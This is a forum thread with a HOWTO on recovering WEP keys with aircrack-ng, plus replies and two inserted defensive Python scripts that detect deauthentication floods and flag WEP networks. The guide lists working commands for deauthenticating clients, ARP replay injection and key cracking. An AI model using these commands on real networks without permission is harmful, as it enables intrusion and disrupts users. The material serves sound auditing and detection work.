
Thread: HOWTO: Aircrack-NG (Simple Guide)

  1. #1
    Join Date
    May 2006
    Location
    100acrewood
    Beans
    7,480
    Distro
    Kubuntu 14.04 Trusty Tahr

    HOWTO: Aircrack-NG (Simple Guide)

    Before you continue to follow this tutorial, you might want to take a look at pyCracker, a useful tool which - hopefully - will make the whole process a little simpler for you.

    This HOWTO is widely based on Aircrack's own documentation. In addition you'll find the latest version of "Aircrack Next Generation" here and Aircrack-PTW here.

    Any suggestions for improvement are welcome. Aim is to keep this HOWTO as simple & comprehensive as possible as I believe that brevity is the soul of wit.

    DISCLAIMER:
    Note that you need formal permission from the owner of any wireless network you wish to audit. Under no circumstances must you compromise a network's security prior to obtaining approval from the owner of the network, and no support will be given to users who seek to do otherwise.

    GENERAL INFORMATION:
    Generally speaking there are 3 types of attacks:

    1. Brute force attack
    2. Dictionary attack
    3. Statistical attack

    By exploiting several security weaknesses of the WEP protocol Aircrack NG makes use of a statistical method to recover WEP keys. Provided that you have collected a sufficient number of IVs (= Initialization Vectors) and depending on the length of the encryption key, determining the actual WEP key will take less than a minute on a common PC.

    HARDWARE:
    I assume that you have successfully patched the driver for your wireless adapter (e.g. Ralink chipset), so I won't go into this. I have tested packet injection and decryption with:

    1. Intel® PRO/Wireless 2200BG (IPW2200)
    2. Linksys WUSB54G V4.0 (RT2570)

    I recommend "Linksys WUSB54G V4.0" as it has a decent reception and reasonable performance. If you need help patching & compiling from source, feel free to post your problems here as well.

    DRIVERS & PATCHES:
    Before you proceed you need to compile your own drivers & install patches for packet re-injection. You find instructions here.

    PREREQUISITES:
    1. You have successfully patched your wireless driver (see link above).
    2. This HOWTO was written for Aircrack-NG v0.9.1 & Aircrack-PTW v1.0.0 on Kubuntu Feisty Fawn 7.04 (32-bit).
    3. '00:09:5B:D7:43:A8' is the MAC address of my network, so you need to replace it with your own.
    4. '00:00:00:00:00:00' is the MAC address of the target client, NOT that of your own wireless card.

    COMMAND LINE:
    Please make sure that you stick to the exact sequence of actions and pay attention to the section on MAC filtering.

    • 1. Enable monitoring with "airmon-ng" (screenshot #1):
      sudo airmon-ng start <interface> <channel>


    • 2. Packet capturing with "airodump-ng" (screenshot #2):
      sudo airodump-ng --channel <channel> --write <file_name> <interface>
      Alternatively, try this (to collect data from target network only and hence increase performance):
      sudo airodump-ng --channel <channel> --bssid 00:09:5B:D7:43:A8 --write <file_name> <interface>
      NOTE:
      --channel... Select preferred channel; optional, however, channel hopping severely impacts and thus slows down collection process.
      --bssid... MAC address of target access point; optional, however, specifying access point will improve performance of collection process.
      --write... Preferred file name; mandatory field (in our case).


    • 3.1. Now check if MAC filtering is enabled or turned off:
      sudo aireplay-ng -1 0 -e <target_essid> -a 00:09:5B:D7:43:A8 -h MY:MA:CA:DD:RE:SS <interface>
      NOTE:
      -1... '0' deauthenticates all clients.
      -e... ESSID of target access point.
      -a... MAC address of target access point.
      -h... MAC address of your choice.


    • 3.2. If the resulting output looks like this...
      18:22:32 Sending Authentication Request
      18:22:32 Authentication successful
      18:22:32 Sending Association Request
      18:22:32 Association successful :-)
      ...then MAC filtering is turned off & you can continue following section 'No MAC filtering', otherwise jump to section 'MAC filtering'.

    >> No MAC filtering <<

    • 4. Packet Re-injection with "aireplay-ng" (screenshot #4):
      sudo aireplay-ng -3 -b 00:09:5B:D7:43:A8 -h MY:MA:CA:DD:RE:SS <interface>
      You'll now see the number of data packets shooting up in 'airodump-ng'. This process can take up to five minutes before you start receiving any ARP requests. So be a little patient at this point. As MAC filtering is off, use an arbitrary MAC address ('MY:MA:CA:DD:RE:SS').

      Continue with #6.

      NOTE:
      -3... Standard ARP-request replay.
      -b... MAC address of target access point.
      -h... MAC address of your choice.

    >> MAC filtering <<

    • 4. Deauthentication with "aireplay-ng" (screenshot #3):
      sudo aireplay-ng -0 5 -a 00:09:5B:D7:43:A8 -c 00:00:00:00:00:00 <interface>
      NOTE:
      -0... Number of deauthentication attempts.
      -a... MAC address of target access point.
      -c... Client MAC address.


    • 5. Packet Re-injection with "aireplay-ng" (screenshot #4):
      sudo aireplay-ng -3 -b 00:09:5B:D7:43:A8 -h 00:00:00:00:00:00 <interface>
      You'll now see the number of data packets shooting up in 'airodump-ng'. This process can take up to five minutes before you start receiving any ARP requests. So be a little patient at this point.

      NOTE:
      -3... Standard ARP-request replay.
      -b... MAC address of target access point.
      -h... Client MAC address.


    • 6. Decryption with "aircrack-ng" & "aircrack-ptw" (screenshot #5):

      Aircrack-ng:
      sudo aircrack-ng <file_name>.cap
      Aircrack-PTW:
      ./aircrack-ptw <file_name>.cap

    CAPTURING:
    This is a summary based on information given here and there, respectively:

    Aircrack-NG:
    64-bit key: ~250,000 packets
    128-bit key: ~1,500,000 packets

    Aircrack-PTW:
    64-bit key: ~20,000 packets [estimate]
    128-bit key: ~85,000 packets

    FINALLY:
    That's it. I am open for further suggestions and hope to gain as much input as possible so that we can improve this guide and at the same time, keep it as simple as possible for other users.

    CHANGE LOG:
    17/08/2007: First version (wieman01).
    20/08/2007: Aircrack-PTW extension (wieman01).
    09/11/2007: General overhaul after a long break ;-) and extension with regard to MAC filtering (wieman01).
    22/12/2008: Update driver patches (wieman01).
    27/01/2009: Note on pyCracker (wieman01).
    Last edited by wieman01; January 27th, 2009 at 07:08 PM.
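    The deauthentication step in the guide above (step 4 under "MAC filtering") is also the most visible trace this kind of audit leaves on the air: a burst of deauth/disassoc management frames from one BSSID, usually addressed to the broadcast address. The following detector is an added example and is not part of wieman01's guide or of the aircrack-ng project. It reads a classic pcap of raw 802.11 frames (link type 105, no radiotap header, which is an assumption about how the capture was saved) and raises one alert per BSSID when a configurable number of deauth/disassoc frames arrive inside a short window. The capture it runs on is constructed inline; the AP address is the guide's own example MAC, the client and second AP addresses are made up.

```python
"""Detect 802.11 deauthentication/disassociation floods in a pcap capture (stdlib only)."""
import struct
from collections import defaultdict, deque

LINKTYPE_IEEE802_11 = 105          # raw 802.11 frames without radiotap header (assumed capture format)
SUBTYPE_DISASSOC = 10
SUBTYPE_DEAUTH = 12
BROADCAST = "ff:ff:ff:ff:ff:ff"


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def mac_bytes(text):
    return bytes(int(x, 16) for x in text.split(":"))


def parse_pcap(data):
    """Yield (timestamp, frame) pairs from a little-endian classic pcap file."""
    magic, _vmaj, _vmin, _tz, _sig, _snap, linktype = struct.unpack("<IHHiIII", data[:24])
    if magic != 0xA1B2C3D4:
        raise ValueError("only little-endian classic pcap is handled here")
    if linktype != LINKTYPE_IEEE802_11:
        raise ValueError("expected link type 105 (IEEE 802.11 without radiotap)")
    off = 24
    while off + 16 <= len(data):
        ts_sec, ts_usec, incl_len, _orig_len = struct.unpack("<IIII", data[off:off + 16])
        off += 16
        yield ts_sec + ts_usec / 1e6, data[off:off + incl_len]
        off += incl_len


def parse_mgmt(frame):
    """Return subtype and addresses of a management frame, or None for anything else."""
    if len(frame) < 24:
        return None
    fc0 = frame[0]
    if (fc0 >> 2) & 0x3 != 0:            # frame type 0 = management
        return None
    return {
        "subtype": (fc0 >> 4) & 0xF,
        "da": mac_str(frame[4:10]),      # addr1 = destination
        "sa": mac_str(frame[10:16]),     # addr2 = source
        "bssid": mac_str(frame[16:22]),  # addr3 = BSSID in management frames
    }


def detect_deauth_floods(pcap_bytes, threshold=5, window=2.0):
    """Alert once per BSSID when >= threshold deauth/disassoc frames fall inside `window` seconds."""
    recent = defaultdict(deque)          # bssid -> deque of (timestamp, was_broadcast)
    alerts = {}
    for ts, frame in parse_pcap(pcap_bytes):
        m = parse_mgmt(frame)
        if m is None or m["subtype"] not in (SUBTYPE_DEAUTH, SUBTYPE_DISASSOC):
            continue
        q = recent[m["bssid"]]
        q.append((ts, m["da"] == BROADCAST))
        while q and ts - q[0][0] > window:   # slide the window forward
            q.popleft()
        if len(q) >= threshold and m["bssid"] not in alerts:
            alerts[m["bssid"]] = {
                "bssid": m["bssid"],
                "first_seen": q[0][0],
                "count": len(q),
                "broadcast": sum(1 for _, bc in q if bc),
            }
    return list(alerts.values())


# ---- constructed sample capture (not a real trace) ----
def mgmt_frame(subtype, da, sa, bssid, body=b""):
    fc = bytes([(subtype << 4) | 0x00, 0x00])       # type 0 (management), no flags
    return fc + b"\x00\x00" + mac_bytes(da) + mac_bytes(sa) + mac_bytes(bssid) + b"\x00\x00" + body


def build_pcap(records):
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, LINKTYPE_IEEE802_11)
    for ts, frame in records:
        sec, usec = int(ts), int(round((ts - int(ts)) * 1e6))
        out += struct.pack("<IIII", sec, usec, len(frame), len(frame)) + frame
    return out


AP = "00:09:5b:d7:43:a8"        # the guide's example AP address, reused as constructed data
CLIENT = "00:0c:29:11:22:33"    # constructed client address
OTHER_AP = "00:1a:2b:3c:4d:5e"  # constructed second AP
REASON_CLASS3 = b"\x07\x00"     # reason code 7 (class 3 frame from non-associated STA), little-endian

SAMPLE_RECORDS = (
    [(1.0 + i * 0.1, mgmt_frame(8, BROADCAST, AP, AP)) for i in range(3)]                                  # beacons
    + [(10.0 + i * 0.1, mgmt_frame(SUBTYPE_DEAUTH, BROADCAST, AP, AP, REASON_CLASS3)) for i in range(5)]   # flood
    + [(50.0, mgmt_frame(SUBTYPE_DEAUTH, CLIENT, OTHER_AP, OTHER_AP, REASON_CLASS3))]                     # single, normal
)
SAMPLE_PCAP = build_pcap(SAMPLE_RECORDS)

if __name__ == "__main__":
    for a in detect_deauth_floods(SAMPLE_PCAP):
        print(f"ALERT bssid={a['bssid']} {a['count']} deauth/disassoc within window, {a['broadcast']} to broadcast")
```

A single deauth with a legitimate reason code is normal housekeeping, so the window and threshold matter more than the frame itself; the broadcast count is the useful secondary signal, since an AP has little reason to deauthenticate everyone at once several times a second. Captures saved with a radiotap header (link type 127) would need the radiotap length field read first to find the 802.11 header.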

  2. #2
    Join Date
    Aug 2007
    Beans
    17

    Re: HOWTO: Aircrack-NG (Simple Guide)

    nice thx

  3. #3
    Join Date
    May 2006
    Location
    100acrewood
    Beans
    7,480
    Distro
    Kubuntu 14.04 Trusty Tahr

    Re: HOWTO: Aircrack-NG (Simple Guide)

    Quote Originally Posted by wifi-staff:
    nice thx
    Let me know if it works for you. If not, suggestions are appreciated. I'll extend it further and briefly explain Aircrack-PTW which is much faster than Aircrack-NG.

  4. #4
    Join Date
    Apr 2007
    Location
    Central Arkansas
    Beans
    85
    Distro
    Ubuntu 7.04 Feisty Fawn

    Re: HOWTO: Aircrack-NG (Simple Guide)

    how do you find the mac address of an access point of a router you are not connected to in the first place? by using the airodump-ng?? it sometimes says "not associated" under bssid (what does that mean)?
    also are you going to make a guide for WPA??
    Screw the fact that it's taking 35% of my CPU power, and that it's drinks my battery power like a thirsty bedouin, that's what eyecandy is all about
    --9a3eedi

  5. #5
    Join Date
    May 2006
    Location
    100acrewood
    Beans
    7,480
    Distro
    Kubuntu 14.04 Trusty Tahr

    Re: HOWTO: Aircrack-NG (Simple Guide)

    Quote Originally Posted by AndrewGene:
    how do you find the mac address of an access point of a router you are not connected to in the first place? by using the airodump-ng?? it sometimes says "not associated" under bssid (what does that mean)?
    Yes, simply start "airodump-ng" and you'll see all available networks (both APs and clients).
    sudo airodump-ng --channel <channel> <interface>
    Quote Originally Posted by AndrewGene:
    also are you going to make a guide for WPA??
    I would love to but WPA is an entirely different topic. You cannot use statistical methods to crack the key like you do with WEP. WPA is much more secure and does not suffer the same flaws as WEP.
    Last edited by wieman01; August 23rd, 2007 at 07:21 AM.
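    The answer above says airodump-ng lists every AP and client it hears, and the question asked what "(not associated)" in the BSSID column means. When airodump-ng is run with --write it also produces a CSV export, and that export is the natural input for an inventory of what is actually on the air. The script below is an added example, not code from this thread or from the aircrack-ng project; it assumes the CSV layout of airodump-ng's .csv file (an AP table and a station table separated by a blank line, with the headers shown in the constructed sample). From an auditor's side it answers the two questions that matter: which APs still run WEP (or no encryption at all) and how many clients depend on them, and which stations are "(not associated)", i.e. not joined to any AP but still probing for network names.

```python
"""Inventory an airodump-ng CSV export: flag WEP/open APs and unassociated stations (stdlib only)."""
import csv
import io
from collections import Counter


def _read_section(block):
    """Parse one CSV section (header row + data rows) into dicts keyed by the stripped header names."""
    rows = list(csv.reader(io.StringIO(block.strip()), skipinitialspace=True))
    if not rows:
        return []
    header = [h.strip() for h in rows[0]]
    out = []
    for row in rows[1:]:
        cells = [c.strip() for c in row]
        if not any(cells):
            continue
        while len(cells) > len(header) and cells[-1] == "":   # drop trailing empty field
            cells.pop()
        if len(cells) > len(header):                           # probed ESSIDs are themselves comma-separated
            cells = cells[:len(header) - 1] + [",".join(cells[len(header) - 1:])]
        cells += [""] * (len(header) - len(cells))
        out.append(dict(zip(header, cells)))
    return out


def parse_airodump_csv(text):
    """Split the export into its AP table and station table (assumed airodump-ng .csv layout)."""
    text = text.replace("\r\n", "\n").strip()
    ap_block, _, sta_block = text.partition("\n\n")
    return _read_section(ap_block), _read_section(sta_block)


def audit(text):
    """Report WEP APs, open APs (with client counts) and stations not associated to any AP."""
    aps, stations = parse_airodump_csv(text)
    clients = Counter(s["BSSID"] for s in stations if s["BSSID"] != "(not associated)")
    report = {"wep": [], "open": [], "unassociated": []}
    for ap in aps:
        entry = {
            "bssid": ap["BSSID"],
            "essid": ap["ESSID"],
            "channel": int(ap["channel"]),
            "ivs": int(ap["# IV"] or 0),        # IVs seen so far; the guide's table says how many expose a WEP key
            "clients": clients[ap["BSSID"]],
        }
        if "WEP" in ap["Privacy"]:
            report["wep"].append(entry)
        elif ap["Privacy"] == "OPN":
            report["open"].append(entry)
    for s in stations:
        if s["BSSID"] == "(not associated)":
            report["unassociated"].append({
                "station": s["Station MAC"],
                "probed": [p for p in s["Probed ESSIDs"].split(",") if p],
            })
    return report


# Constructed sample export (not a real capture); the first AP uses the guide's example MAC.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:09:5B:D7:43:A8, 2007-08-17 18:20:01, 2007-08-17 18:25:40,  6,  54, WEP, WEP, , -40,      312,    21000,   0.  0.  0.  0,   7, MyWLAN, 
00:1A:2B:3C:4D:5E, 2007-08-17 18:20:03, 2007-08-17 18:25:41, 11,  54, WPA2, CCMP, PSK, -55,      280,        0,   0.  0.  0.  0,   8, Neighbor, 
00:1F:33:AA:BB:CC, 2007-08-17 18:20:09, 2007-08-17 18:25:30,  1,  54, OPN, , , -70,       90,        0,   0.  0.  0.  0,   4, Cafe, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
00:0C:29:11:22:33, 2007-08-17 18:20:05, 2007-08-17 18:25:39, -50,      540, 00:09:5B:D7:43:A8, MyWLAN
00:16:CE:AA:BB:CC, 2007-08-17 18:21:00, 2007-08-17 18:25:00, -60,       12, (not associated), Linksys,default
"""

if __name__ == "__main__":
    r = audit(SAMPLE_CSV)
    for ap in r["wep"]:
        print(f"WEP   {ap['bssid']} ch{ap['channel']:<2} {ap['essid']!r}: {ap['clients']} client(s), {ap['ivs']} IVs seen")
    for ap in r["open"]:
        print(f"OPEN  {ap['bssid']} ch{ap['channel']:<2} {ap['essid']!r}: {ap['clients']} client(s)")
    for s in r["unassociated"]:
        print(f"PROBE {s['station']} not associated, probing for {s['probed']}")
```

A station listed as "(not associated)" is a client that is transmitting (typically probe requests for networks it remembers) without having joined any AP in range, which is why it shows up with probed ESSIDs but no BSSID. On a real export, run `audit(open("<file_name>-01.csv").read())` against the file airodump-ng writes next to the .cap.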

  6. #6
    Join Date
    Apr 2007
    Location
    India
    Beans
    Hidden!
    Distro
    Ubuntu 9.04 Jaunty Jackalope

    Re: HOWTO: Aircrack-NG (Simple Guide)

    Very nice and detailed guide. Thanks a ton.

  7. #7
    Join Date
    Aug 2007
    Beans
    9

    Re: HOWTO: Aircrack-NG (Simple Guide)

    Yeah very nice

  8. #8
    Join Date
    Jul 2007
    Location
    US
    Beans
    33
    Distro
    Ubuntu 7.04 Feisty Fawn

    Re: HOWTO: Aircrack-NG (Simple Guide)

    Thanks

  9. #9
    Join Date
    Apr 2007
    Location
    Central Arkansas
    Beans
    85
    Distro
    Ubuntu 7.04 Feisty Fawn

    Re: HOWTO: Aircrack-NG (Simple Guide)

    Quote Originally Posted by wieman01:
    Yes, simply start "airmon-ng" and you'll see all available networks (both APs and clients).


    I would love to but WPA is an entirely different topic. You cannot use statistical methods to crack the key like you do with WEP. WPA is much more secure and does not suffer the same flaws as WEP.

    First, my airmon-ng command only puts my card in monitor mode. It doesn't show networks--not even my own WEP network.

    Second, back whenever crimemachine.com (just the name of a network auditing site) was up and running they had tutorial videos of how to safely audit networks. They actually said that WPA is quicker to crack (using the tools mentioned above) than WEP--albeit a less common solution--because when they were fixing the problems with WEP they created another one in WPA. I believe this is why there are two versions of WPA protection.
    Screw the fact that it's taking 35% of my CPU power, and that it's drinks my battery power like a thirsty bedouin, that's what eyecandy is all about
    --9a3eedi

  10. #10
    Join Date
    May 2006
    Location
    100acrewood
    Beans
    7,480
    Distro
    Kubuntu 14.04 Trusty Tahr

    Re: HOWTO: Aircrack-NG (Simple Guide)

    Quote Originally Posted by AndrewGene:
    First, my airmon-ng command only puts my card in monitor mode. It doesn't show networks--not even my own WEP network.
    "airodump-ng" of course... my fault. I have corrected the other post.
    Quote Originally Posted by AndrewGene:
    Second, back whenever crimemachine.com (just the name of a network auditing site) was up and running they had tutorial videos of how to safely audit networks. They actually said that WPA is quicker to crack (using the tools mentioned above) than WEP--albeit a less common solution--because when they were fixing the problems with WEP they created another one in WPA. I believe this is why there are two versions of WPA protection.
    WPA is WEP based and was meant as an interim solution, you're right. And there are ways to perform attacks against WPA networks as well, I found some stuff here. It just takes way more time & effort as far as I know as you are limited to brute-force and dictionary attacks. Nevertheless it's possible.

    Tell you what... Since I don't know much concerning I'll keep looking for possible solutions/approaches. I cannot promise but I'll see what is available and keep you posted. If you come across something interesting in return I would appreciate if you posted your results here.
